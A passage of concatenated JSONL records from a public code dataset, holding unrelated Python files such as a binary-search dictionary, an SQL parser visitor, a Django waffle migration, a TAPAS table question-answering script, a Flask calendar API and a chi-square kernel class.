{}\n","sub_path":"xai/brain/wordbase/nouns/_halberds.py","file_name":"_halberds.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"113025242","text":"class Dicionario:\n '''\n Self.key é o valor da chave\n Self.Values é o numero de repticao da chave\n '''\n def __init__(self, string):\n self.key = []\n self.values = []\n string = string.split()\n for palavra in string:\n valor = self.get(palavra)\n if valor == None:\n self.put(palavra, 1)\n else:\n self.put(palavra, valor + 1)\n\n def __str__(self):\n s = \"\"\n for i in range(len(self.values)):\n s += \"%s %d\\n\"%(self.key[i],self.values[i])\n return s\n\n def indice(self, chave):\n '''\n :param chave: chave a ser procurada\n :return: Achou, indice\n '''\n ini, fim = 0, len(self.key)\n while ini < fim:\n meio = (ini + fim)//2\n if self.key[meio] == chave:\n return True, meio\n elif self.key[meio] < chave:\n ini = meio + 1\n else:\n fim = meio\n return False, ini\n\n def get(self,chave):\n achou, i = self.indice(chave)\n if achou:\n return self.values[i]\n return None\n\n def put(self, chave, valor):\n achou, i = self.indice(chave)\n if achou:\n self.values[i] = valor\n else:\n self.key.append(0)\n self.values.append(0)\n for j in range(len(self.key) - 2, i, -1):\n self.key[j + 1] = self.key[j]\n self.values[j + 1] = self.values[j]\n self.key[i] = chave\n self.values[i] = valor\n\ndef main():\n lst_pal = '30 33 40 55 55 60 60 66 70 88'\n dicio = Dicionario(lst_pal)\n dicio.put('20', 1)\n dicio.put('10',1)\n dicio.put('64',1)\n\n print(dicio)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Dicionario/DicioBB.py","file_name":"DicioBB.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"43485559","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nurl = 'https://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture'\r\nr = requests.get(url)\r\nsoup = BeautifulSoup(r.text)\r\nwith open(\"demo.txt\",'w') as openfile:\r\n \r\n for article in soup.find_all(class_=\"content-section\"):\r\n openfile.write(article.encode('utf-8').strip())\r\n #print(article.text)\r\n openfile.close()\r\n","sub_path":"webpage decode 2.py","file_name":"webpage decode 2.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"647768306","text":"# coding=utf-8\n# Copyright 2018-2020 EVA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom src.parser.select_statement import SelectStatement\nfrom src.parser.table_ref import TableRef\n\nfrom src.parser.evaql.evaql_parserVisitor import evaql_parserVisitor\nfrom src.parser.evaql.evaql_parser import evaql_parser\nfrom src.utils.logging_manager import LoggingLevel, LoggingManager\n\n##################################################################\n# TABLE SOURCES\n##################################################################\n\n\nclass TableSources(evaql_parserVisitor):\n def visitTableSources(self, ctx: evaql_parser.TableSourcesContext):\n\n table_list = []\n table_sources_count = len(ctx.tableSource())\n for table_sources_index in range(table_sources_count):\n table = self.visit(ctx.tableSource(table_sources_index))\n table_list.append(table)\n\n return table_list\n\n def visitTableSourceItemWithSample(\n self, ctx: evaql_parser.TableSourceItemWithSampleContext):\n sample_freq = None\n table = self.visit(ctx.tableSourceItem())\n if ctx.sampleClause():\n sample_freq = self.visit(ctx.sampleClause())\n return TableRef(table, sample_freq)\n\n # Nested sub query\n def visitSubqueryTableItem(\n self, ctx: evaql_parser.SubqueryTableItemContext):\n return self.visit(ctx.selectStatement())\n\n def visitUnionSelect(self, ctx: evaql_parser.UnionSelectContext):\n left_selectStatement = self.visit(ctx.left)\n right_selectStatement = self.visit(ctx.right)\n # This makes a difference becasue the LL parser (Left-to-right)\n while right_selectStatement.union_link is not None:\n right_selectStatement = right_selectStatement.union_link\n # We need to check the correctness for union operator.\n # Here when parsing or later operator, plan?\n right_selectStatement.union_link = left_selectStatement\n if ctx.unionAll is None:\n right_selectStatement.union_all = False\n else:\n right_selectStatement.union_all = True\n return right_selectStatement\n\n def visitQuerySpecification(\n self, ctx: evaql_parser.QuerySpecificationContext):\n target_list = None\n from_clause = None\n where_clause = None\n orderby_clause = None\n limit_count = None\n\n # first child will be a SELECT terminal token\n\n for child in ctx.children[1:]:\n try:\n rule_idx = child.getRuleIndex()\n if rule_idx == evaql_parser.RULE_selectElements:\n target_list = self.visit(child)\n\n elif rule_idx == evaql_parser.RULE_fromClause:\n clause = self.visit(child)\n from_clause = clause.get('from', None)\n where_clause = clause.get('where', None)\n\n elif rule_idx == evaql_parser.RULE_orderByClause:\n orderby_clause = self.visit(ctx.orderByClause())\n\n elif rule_idx == evaql_parser.RULE_limitClause:\n limit_count = self.visit(ctx.limitClause())\n\n except BaseException as e:\n # stop parsing something bad happened\n LoggingManager().log('Error while parsing \\\n visitQuerySpecification', LoggingLevel.ERROR)\n raise e\n\n # we don't support multiple table sources\n if from_clause is not None:\n from_clause = from_clause[0]\n\n select_stmt = SelectStatement(\n target_list, from_clause, where_clause,\n orderby_clause_list=orderby_clause,\n limit_count=limit_count)\n\n return select_stmt\n\n def visitSelectElements(self, ctx: evaql_parser.SelectElementsContext):\n select_list = []\n select_elements_count = len(ctx.selectElement())\n for select_element_index in range(select_elements_count):\n element = self.visit(ctx.selectElement(select_element_index))\n select_list.append(element)\n\n return select_list\n\n def visitFromClause(self, ctx: evaql_parser.FromClauseContext):\n from_table = None\n where_clause = None\n\n if ctx.tableSources():\n from_table = self.visit(ctx.tableSources())\n if ctx.whereExpr is not None:\n where_clause = self.visit(ctx.whereExpr)\n\n return {\"from\": from_table, \"where\": where_clause}\n","sub_path":"src/parser/parser_visitor/_table_sources.py","file_name":"_table_sources.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"540614308","text":"# -*- coding: utf-8 -*-\nimport re\n\n\n#注释符号\ncommentSymbol=\"#\"\n#表头\ntableHeadList = []\n#表头标识符\ntableHeadSymbol = \"CHROM\"\n#数据的统计\ndataMap = {}\n#数据的输出列表\ndataList = []\n\nwith open(\"./test.txt\") as infile:\n for line in infile:\n line = line.strip()\n #去除注释行\n if ( line.startswith(commentSymbol)):\n continue \n \n if ( line.startswith(tableHeadSymbol)):\n tableHead = re.split(\"\\s+\", line)\n tableHeadList = tableHead[:4]\n continue\n #数据行\n elementList = []\n elementList = re.split(\"\\s+\", line)\n #DP4数据列获取\n freqList = re.split(\";\", elementList[31])\n #DP4数据获取\n DP4String = freqList[-2]\n #DP4数据集\n DP4_list= re.split(\"=\",DP4String)[-1].split(\",\")\n #DP4精度换算\n DP4_list=[ float(x) for x in DP4_list]\n #DP4频率计算\n freq=(DP4_list[2]+DP4_list[3])/sum(DP4_list)\n #CHROM\tPOS\t\tREF\tALT\n gene_position = elementList[:5]\n del gene_position[2]\n\n #频率列\n freStr = str(round(freq,3))\n gene_position.append(freStr)\n #存在相同的基因则取出并且count加1 同时添加最大值 最小值\n genKeyId = gene_position[:4]\n genKey = \",\".join(genKeyId)\n if ( dataMap.has_key(genKey)) :\n for element in dataList :\n listId = element[:4]\n listKey = \",\".join(listId)\n if (listKey == genKey) :\n\n fre = element[-1]+\",\"+freStr\n element[-1] = fre\n continue\n else:\n dataMap[genKey] = gene_position[-1]\n dataList.append(gene_position)\n \n\n\n\n \ntableHeadList.append(\"count\")\ntableHeadList.append(\"min\")\ntableHeadList.append(\"max\")\nf=open('newfile', 'w')\n\nfor headElement in tableHeadList :\n f.write(headElement)\n f.write(\"\\t\")\nf.write(\"\\n\")\n\nfor element in dataList :\n for data in element :\n f.write(str(data))\n f.write(\"\\t\")\n freInfo = str(element[-1])\n freInfoList = freInfo.split(\",\")\n f.write(str(len(freInfoList)))\n f.write(\"\\t\")\n f.write(min(freInfoList))\n f.write(\"\\t\")\n f.write(max(freInfoList))\n f.write(\"\\n\")\n\nf.close()\n\n\n","sub_path":"bio/baseline_count.py","file_name":"baseline_count.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"121385070","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef make_waffles(apps, schema_editor):\n # Create the waffle flags and switches we currently need.\n Flag = apps.get_model('waffle', 'Flag')\n Switch = apps.get_model('waffle', 'Switch')\n\n Flag.objects.create(\n name='feedbackdev',\n everyone=False,\n superusers=False,\n staff=False,\n authenticated=False,\n rollout=False,\n note='',\n testing=False)\n\n Flag.objects.create(\n name='ditchchart',\n everyone=False,\n superusers=False,\n staff=False,\n authenticated=False,\n rollout=False,\n note='',\n testing=False)\n\n Switch.objects.create(\n name='gengosystem',\n note='Enables/disables Gengo API usage',\n active=True)\n\n Flag.objects.create(\n name='thankyou',\n everyone=False,\n superusers=False,\n staff=False,\n authenticated=False,\n rollout=False,\n note='',\n testing=False)\n\n\ndef remove_waffles(apps, schema_editor):\n # Create the waffle flags and switches we currently need.\n Flag = apps.get_model('waffle', 'Flag')\n Switch = apps.get_model('waffle', 'Switch')\n\n Flag.objects.filter(\n name__in=['feedbackdev', 'ditchchart', 'thankyou']).delete()\n Switch.objects.filter(name='gengosystem').delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0001_initial'),\n ('waffle', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(make_waffles, remove_waffles),\n ]\n","sub_path":"fjord/base/migrations/0002_make_waffles.py","file_name":"0002_make_waffles.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"534622297","text":"from flask import (\n Blueprint, request\n)\nimport flask\nimport json\nfrom integrated_api import postgres, utils, googleCalendar\n\n\nbp = Blueprint('api_v2', __name__, url_prefix='/api/v2')\n\n@bp.route('/calendars/', methods=['POST', 'DELETE', 'PUT', 'GET'])\ndef calendars():\n try:\n requestBody = utils.getJSONBody(request.get_data(as_text=True))\n if(request.method in ('POST', 'DELETE', 'PUT')):\n if (len(requestBody) == 0):\n return \"Error, you use POST, DELETE or PUT method but data empty. Check API documentation\"\n else:\n if(request.method=='POST'):\n summary = requestBody.get('summary', None)\n if(summary):\n timeZone = requestBody.get('time_zone', None)\n if(timeZone):\n created_calendar = googleCalendar.createCalendar(summary, timeZone)\n else:\n created_calendar = googleCalendar.createCalendar(summary)\n data = {\n 'calendar_id' : created_calendar['id'],\n 'calendar_name' : created_calendar['summary'],\n 'platform_id': 'Google Calendar'\n }\n data = postgres.upsertCalendar(data)\n data = json.dumps(created_calendar, default=str)\n else:\n return \"Error, creating calendar need summary and timezone\"\n elif (request.method in ('DELETE', 'PUT')):\n calendarID = requestBody.get('id', None)\n if(calendarID):\n if(request.method=='DELETE'):\n edited_calendar = googleCalendar.deleteCalendar(calendarID)\n edited_calendar = postgres.deleteCalendar(calendarID)\n elif(request.method=='PUT'):\n edited_calendar = googleCalendar.updateCalendar(data=requestBody)\n else:\n return \"Error, unrecognized request method\"\n data = json.dumps(edited_calendar, default=str)\n else:\n return \"Error, deleting or updatingcalendar need calendar ID\"\n else:\n data = json.dumps(googleCalendar.listCalendar(), default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n except Exception as e:\n errormessage = utils.customError(\"calendars\", e)\n return errormessage\n\n@bp.route('/scheduled_events/', methods=['POST', 'PATCH', 'PUT', 'GET'])\ndef scheduled_events():\n try:\n requestBody = utils.getJSONBody(request.get_data(as_text=True))\n if (request.method in ('POST', 'DELETE', 'PUT')):\n if (len(requestBody) == 0):\n return \"Error, you use POST, DELETE or PUT method but data empty. Check API documentation\"\n else:\n eventID = requestBody.get('event_id', None)\n if (eventID):\n if(request.method=='POST'):\n data = googleCalendar.upsertEvent(requestBody)\n data = json.dumps(data, default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n elif (request.method in ('PATCH', 'PUT')):\n status = requestBody.get('status', None)\n if(status in ('U', 'C')):\n data = googleCalendar.upsertEvent(requestBody, status)\n data = json.dumps(data, default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n else:\n return \"Error, status update should be in 'U' for update and 'C' for cancel\"\n else:\n return \"Error, event ID is required.\"\n else:\n pass\n except Exception as e:\n errormessage = utils.customError(\"scheduled_events\", e)\n return errormessage\n\n@bp.route('/persons/', methods=['GET'])\ndef retrieve_person(personID):\n try:\n\n if (personID):\n data = postgres.listPerson(personID=personID)\n else:\n data = None\n data = json.dumps(data, default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n except Exception as e:\n errormessage = utils.customError(\"list-event\", e)\n return errormessage\n\n@bp.route('/persons/', methods=['GET', 'POST', 'PUT'])\ndef persons():\n try:\n print(request.method)\n print(request.args.get('personID', None))\n requestBody = utils.getJSONBody(request.get_data(as_text=True))\n if(request.method in ('POST', 'PUT')):\n if(len(requestBody)<=0):\n return \"Error, you use POST or PATCH method but data empty. Check API documentation\"\n if request.method == 'POST':\n if(requestBody.get('person_id',None)):\n del requestBody['person_id']\n data = json.dumps(postgres.upsertPerson(data=requestBody), default=str)\n else:\n print(request.method)\n personID = request.args.get('personID', None)\n print(personID)\n if (personID):\n data = json.dumps(postgres.listPerson(personID=personID), default=str)\n else:\n data = json.dumps(postgres.listPerson(), default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n except Exception as e:\n errormessage = utils.customError(\"persons\", e)\n return errormessage\n","sub_path":"integrated_api/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"238615303","text":"class Solution(object):\n def coinChange(self, coins, amount):\n n = len(coins)\n \n # dp is a 2d array with dimension n x (amount + 1)\n # dp[i][j] is the fewest number of coins to change j cents using coins[0], coins[1]...coins[i]\n dp = [[sys.maxint] * (amount + 1) for _ in range(n)]\n\n\n for i in range(n):\n #always need 0 coins for changing 0 cents\n dp[i][0] = 0\n \n for j in range(1, amount + 1):\n if j - coins[i] >= 0:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - coins[i]] + 1)\n elif i > 0:\n dp[i][j] = dp[i - 1][j]\n \n return dp[n - 1][amount] if dp[n - 1][amount] != sys.maxint else -1\n","sub_path":"algorithms/CoinChangeI/CoinChangeI.py","file_name":"CoinChangeI.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"636568103","text":"from pum.core.deltapy import DeltaPy\nimport os\n\nclass RecreateViewsAndFunctions(DeltaPy):\n\n def run(self):\n\n delta_dir = self.delta_dir\n\n self.write_message(\"Reloading views and functions\")\n\n views_sh = \"PGSERVICE=qwat_test SRID=21781 {}../../ordinary_data/views/rewrite_views.sh\".format(self.delta_dir)\n functions_sh = \"PGSERVICE=qwat_test SRID=21781 {}../../ordinary_data/functions/rewrite_functions.sh\".format(self.delta_dir)\n\n # Execute commands\n os.system(views_sh)\n os.system(functions_sh)\n","sub_path":"update/delta/post-all.py","file_name":"post-all.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"516048314","text":"# -*- coding: utf-8 -*-\r\nS=str() #产生空字符串\r\n\r\nst='hello word!'\r\nz1=st.find('he',0,len(st)) #返回包含子串的开始索引位置,否则-1\r\nz2=st.find('he',1,len(st))\r\nprint(z1,z2)\r\n\r\nstt=st.replace('or','kl') #原来的st不变\r\nprint(stt)\r\nprint(st)\r\n\r\nst1='joh'\r\nst2=st1+' '+st\r\nprint(st2)\r\n\r\nstr1='jo'\r\nstr2='qb'\r\nstr3='qb'\r\ns1=str1!=str2\r\ns2=str2==str3\r\nprint(s1,s2)\r\n\r\n\r\n","sub_path":"程序与数据/第1章 Python基础知识/1.5.3.py","file_name":"1.5.3.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"156233062","text":"N = list(map(int, input().split()))\n\nK = list(map(int, input().split()))\n\n# 상품 값을 내림차순으로 정렬\nK.sort(reverse=True)\n\n# 최소한으로 구매 가능한 비싼 상품의 개수를 카운트하는 변수\ncount = 0\n\n# 가장 큰 상품의 값 순서대로 K[i]를 구매가능하면 count를 올리고, N[1] < K[i]라면 그냥 지나간다.\nfor i in range(len(K)) :\n if N[1] >= K[i] :\n N[1] = N[1] - K[i]\n count += 1\n else :\n continue\n# 살 수 있는 상품이 하나도 없었다면 0을 출력한다.\nif count == 0 :\n print(0)\nelse :\n print(count)","sub_path":"3주차/노하람/(구간 합)재벌의 쇼핑.py","file_name":"(구간 합)재벌의 쇼핑.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"621463395","text":"\nimport csv\n\ndef read_tab_sep():\n inpfile=open(\"input_tab_sep.txt\",'r')\n inp_reader=csv.reader(inpfile, delimiter='\\t')\n for row in inp_reader:\n print (row)\n print (row[0])\n\n#read_tab_sep()\n\ndef read_space_sep():\n inpfile=open(\"input_space_sep.txt\",'r')\n inp_reader=csv.reader(inpfile, delimiter=' ')\n for row in inp_reader:\n print (row)\n print (row[0])\n\n\n#read_space_sep()\n\ndef read_comma_sep():\n inpfile=open(\"input_comma_sep.txt\",'r')\n inp_reader=csv.reader(inpfile, delimiter=\",\", quotechar=\"'\")\n for row in inp_reader:\n print (row)\n print (row[0])\n\n\nread_comma_sep()","sub_path":"new_pract/read_tab_sep.py","file_name":"read_tab_sep.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178629246","text":"import tensorflow.compat.v1 as tf\nimport os \nimport shutil\nimport csv\nimport pandas as pd\nimport IPython\n\nprint(\"1\")\n\ntf.get_logger().setLevel('ERROR')\n\nfrom tapas.utils import tf_example_utils\nfrom tapas.protos import interaction_pb2\nfrom tapas.utils import number_annotation_utils\nfrom tapas.scripts import prediction_utils\n\nprint(\"2\")\n\nos.makedirs('results/sqa/tf_examples', exist_ok=True)\nos.makedirs('results/sqa/model', exist_ok=True)\nwith open('results/sqa/model/checkpoint', 'w') as f:\n f.write('model_checkpoint_path: \"model.ckpt-0\"')\nfor suffix in ['.data-00000-of-00001', '.index', '.meta']:\n shutil.copyfile(f'tapas_sqa_base/model.ckpt{suffix}', f'results/sqa/model/model.ckpt-0{suffix}')\n\n\nprint(\"3\")\n\nmax_seq_length = 512\nvocab_file = \"tapas_sqa_base/vocab.txt\"\nconfig = tf_example_utils.ClassifierConversionConfig(\n vocab_file=vocab_file,\n max_seq_length=max_seq_length,\n max_column_id=max_seq_length,\n max_row_id=max_seq_length,\n strip_column_names=False,\n add_aggregation_candidates=False,\n)\nconverter = tf_example_utils.ToClassifierTensorflowExample(config)\n\nprint(\"4\")\n\ndef convert_interactions_to_examples(tables_and_queries):\n \"\"\"Calls Tapas converter to convert interaction to example.\"\"\"\n for idx, (table, queries) in enumerate(tables_and_queries):\n interaction = interaction_pb2.Interaction()\n for position, query in enumerate(queries):\n question = interaction.questions.add()\n question.original_text = query\n question.id = f\"{idx}-0_{position}\"\n for header in table[0]:\n interaction.table.columns.add().text = header\n for line in table[1:]:\n row = interaction.table.rows.add()\n for cell in line:\n row.cells.add().text = cell\n number_annotation_utils.add_numeric_values(interaction)\n for i in range(len(interaction.questions)):\n try:\n yield converter.convert(interaction, i)\n except ValueError as e:\n print(f\"Can't convert interaction: {interaction.id} error: {e}\")\n \ndef write_tf_example(filename, examples):\n with tf.io.TFRecordWriter(filename) as writer:\n for example in examples:\n writer.write(example.SerializeToString())\n\ndef predict(table_data, queries):\n print(\"5\")\t\n table = [list(map(lambda s: s.strip(), row.split(\"|\"))) \n for row in table_data.split(\"\\n\") if row.strip()]\n examples = convert_interactions_to_examples([(table, queries)])\n write_tf_example(\"results/sqa/tf_examples/test.tfrecord\", examples)\n write_tf_example(\"results/sqa/tf_examples/random-split-1-dev.tfrecord\", [])\n print(\"6\")\n os.system(''' python tapas/tapas/run_task_main.py \\\n --task=\"SQA\" \\\n --output_dir=\"results\" \\\n --noloop_predict \\\n --test_batch_size=3 \\\n --tapas_verbosity=\"ERROR\" \\\n --compression_type= \\\n --init_checkpoint=\"tapas_sqa_base/model.ckpt\" \\\n --bert_config_file=\"tapas_sqa_base/bert_config.json\" \\\n --mode=\"predict\" 2> error''')\n\n\n\n results_path = \"results/sqa/model/test_sequence.tsv\"\n all_coordinates = []\n df = pd.DataFrame(table[1:], columns=table[0])\n #display(IPython.display.HTML(df.to_html(index=False)))\n print(\"7\")\n with open(results_path) as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n for row in reader:\n coordinates = prediction_utils.parse_coordinates(row[\"answer_coordinates\"])\n all_coordinates.append(coordinates)\n answers = ', '.join([table[row + 1][col] for row, col in coordinates])\n position = int(row['position'])\n print(\">\", queries[position])\n print(answers)\n return all_coordinates\n\n\n\n# Example nu-1000-0\nresult = predict(\"\"\"\nPos | No | Driver | Team | Laps | Time/Retired | Grid | Points\n1 | 32 | Patrick Carpentier | Team Player's | 87 | 1:48:11.023 | 1 | 22 \n2 | 1 | Bruno Junqueira | Newman/Haas Racing | 87 | +0.8 secs | 2 | 17 \n3 | 3 | Paul Tracy | Team Player's | 87 | +28.6 secs | 3 | 14\n4 | 9 | Michel Jourdain, Jr. | Team Rahal | 87 | +40.8 secs | 13 | 12\n5 | 34 | Mario Haberfeld | Mi-Jack Conquest Racing | 87 | +42.1 secs | 6 | 10\n6 | 20 | Oriol Servia | Patrick Racing | 87 | +1:00.2 | 10 | 8 \n7 | 51 | Adrian Fernandez | Fernandez Racing | 87 | +1:01.4 | 5 | 6\n8 | 12 | Jimmy Vasser | American Spirit Team Johansson | 87 | +1:01.8 | 8 | 5\n9 | 7 | Tiago Monteiro | Fittipaldi-Dingman Racing | 86 | + 1 Lap | 15 | 4\n10 | 55 | Mario Dominguez | Herdez Competition | 86 | + 1 Lap | 11 | 3\n11 | 27 | Bryan Herta | PK Racing | 86 | + 1 Lap | 12 | 2\n12 | 31 | Ryan Hunter-Reay | American Spirit Team Johansson | 86 | + 1 Lap | 17 | 1\n13 | 19 | Joel Camathias | Dale Coyne Racing | 85 | + 2 Laps | 18 | 0\n14 | 33 | Alex Tagliani | Rocketsports Racing | 85 | + 2 Laps | 14 | 0\n15 | 4 | Roberto Moreno | Herdez Competition | 85 | + 2 Laps | 9 | 0\n16 | 11 | Geoff Boss | Dale Coyne Racing | 83 | Mechanical | 19 | 0\n17 | 2 | Sebastien Bourdais | Newman/Haas Racing | 77 | Mechanical | 4 | 0\n18 | 15 | Darren Manning | Walker Racing | 12 | Mechanical | 7 | 0\n19 | 5 | Rodolfo Lavin | Walker Racing | 10 | Mechanical | 16 | 0\n\"\"\", [\"what were the team names?\",\n \"of these, which points did Mario Haberfeld and Oriol Servia score?\",\n \"who scored 2?\"])\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"286104586","text":"from spider.download_course_w3school import DownloadW3School\nurl=\"https://www.w3school.com.cn/html/index.asp\"\nspider=DownloadW3School(url)\n# print(spider.is_in_limit(\"https://www.w3school.com.cn/html/html_comments.asp\"))\n# print(spider.is_in_limit(\"https://www.w3school.com.cn/tags/index.asp\"))\nspider.get_catlog()\n# content=spider.get_page_content(\"https://www.w3school.com.cn/html/html_jianjie.asp\")\n# print(content)\nprint(spider.catlogDictList)\ncatlogList=spider.catlogDictList\nfor category in catlogList:\n print(category)\n for categoryName, urlTupleList in category.items():\n print(categoryName)\n for title, url in urlTupleList:\n print(title,url)\n\nspider.start_download()\n#5df779c098f10fedd651be64","sub_path":"test/spider/test_w3school.py","file_name":"test_w3school.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571351628","text":"import numpy as np\nfrom math import *\n\n\n# Partitional Clustering\nX = [(0, 5), (1, 3), (2, 4), (6, 2), (7, 0), (8, 3), (9, 1)]\ndist = lambda x, y: sqrt((x[0] - y[0])**2 + (x[1] - y[1])**2)\n\ndef median(xs):\n xs = np.array(xs)\n n = xs.shape[0]\n if n % 2:\n return tuple(xs[n // 2, :])\n else:\n return tuple((xs[n // 2 - 1, :] + xs[n // 2, :]) / 2)\n\n\nm = [(4, 2), (11, 3)]\n\nn = 5\nfor i in range(n):\n clusters = [[] for _ in range(len(m))]\n for j, x in enumerate(X):\n dm = [dist(mx, x) for mx in m]\n \n if dm[0] < dm[1]:\n bold1, bold2 = r'\\textbf', ''\n c = 0\n else:\n bold1, bold2 = '', r'\\textbf'\n c = 1\n\n clusters[c].append(x)\n print(f'\\item $p_{j+1}$ {bold1}{{distance to {m[0]}: {dm[0]:.3f}}}; {bold2}{{distance to {m[1]}: {dm[1]:.6f}}}')\n\n changed = False\n for c, cl in enumerate(clusters):\n print(f'$C_{c}$ points: \\{{{\", \".join(map(str, cl))}\\}}')\n # med = tuple([median(x) for x in cl])\n med = median(cl)\n print(f'$C_{c}$ median: {med}')\n if med != m[c]:\n changed = True\n m[c] = med\n\n if not changed:\n print(\"No medians changed.\")\n print(\"Algorithm finished after\", i, \"iterations.\")\n print(\"Medians:\")\n print(m)\n break\n\n print()","sub_path":"comp4211/problem-set/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"301775324","text":"import numpy as np\nfrom check_data_compatibility import *\n\nclass ChiSquare:\n\n\t\"\"\"\n\tThis is a class of evaluating the chi-square kernel function.\n\n\tAttributes\n\t----------\n\tdata : numpy.ndarray\n\t\tThe array at which the chi-square kernel function is to evaluated.\n\tN, d : int, int\n\t\tThe shape of data array.\n\n\tMethods\n\t-------\n\tkernel_matrix(new_data)\n\t\tEvaluates the chi-square kernel function at new_data.\n\n\tkernel_single_eval(new_data)\n\t\tEvaluates the chi-square kernel function at new_data involving double `for` loops;\n\t\tless efficient than self.kernel_matrix.\n\t\n\tReference\n\t---------\n\tVedaldi, Andrea, and Andrew Zisserman. 2012. “Efficient Additive Kernels via Explicit Feature Maps.”\n\t\tIEEE Transactions on Pattern Analysis and Machine Intelligence 34 (3): 480–92.\n\n\t\"\"\"\n\t\n\tdef __init__(self, data):\n\t\t\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\tdata : numpy.ndarray\n\t\t\tThe array at which the chi-square kernel function is to evaluated.\n\t\t\n\t\t\"\"\"\n\t\t\n\t\tif not isinstance(data, np.ndarray):\n\t\t\tdata = np.array(data)\n\t\t\n\t\tif len(data.shape) == 1:\n\t\t\tdata = data.reshape(-1, 1)\n\t\t\n\t\tself.data = data\n\t\tself.N, self.d = self.data.shape\n\t\n\tdef kernel_matrix(self, new_data):\n\t\t\n\t\t\"\"\"\n\t\tEvaluates the chi-square kernel function at new_data.\n\t\tEach entry is k(X_i, Y_j), where X_i corresponds to the i-th row of data,\n\t\tY_j corresponds to the j-th row of new_data.\n\n\t\tParameters\n\t\t----------\n\t\tnew_data : numpy.ndarray\n\t\t\tThe array at which the chi-square kernel function is to evaluated.\n\n\t\tReturns\n\t\t-------\n\t\tnumpy.ndarray\n\t\t\tThe array of chi-square kernel function evaluations.\n\n\t\t\"\"\"\n\t\t\n\t\tif not isinstance(new_data, np.ndarray):\n\t\t\tnew_data = np.array(new_data)\n\t\t\n\t\tif len(new_data.shape) == 1:\n\t\t\tnew_data = new_data.reshape(-1, 1)\n\t\t\n\t\tn, d1 = new_data.shape\n\t\t\n\t\tcheck_data_compatibility(self.data, new_data)\n\t\t\n\t\ttiled_data = np.tile(new_data, self.N).reshape(1, -1)\n\t\ttiled_land = np.tile(self.data.reshape(1, -1), n)\n\t\t\n\t\tprod1 = tiled_data * tiled_land\n\t\tsum1 = tiled_data + tiled_land\n\t\t\n\t\tpower = 2. * np.sum(np.vstack(np.split(prod1 / sum1, self.N * n, axis=1)), axis=1)\n\t\toutput = power.reshape(n, self.N)\n\t\t\n\t\treturn output.T\n\t\n\tdef kernel_single_eval(self, new_data):\n\t\t\n\t\t\"\"\"\n\t\tEvaluates the chi-square kernel function at new_data involving double `for` loops.\n\t\tThis approach is less efficient comparing to self.kernel_matrix.\n\t\tEach entry is k(X_i, Y_j), where X_i corresponds to the i-th row of data,\n\t\tY_j corresponds to the j-th row of new_data.\n\n\t\tParameters\n\t\t----------\n\t\tnew_data : numpy.ndarray\n\t\t\tThe array at which the chi-square kernel function is to evaluated.\n\n\t\tReturns\n\t\t-------\n\t\tnumpy.ndarray\n\t\t\tThe array of chi-square kernel function 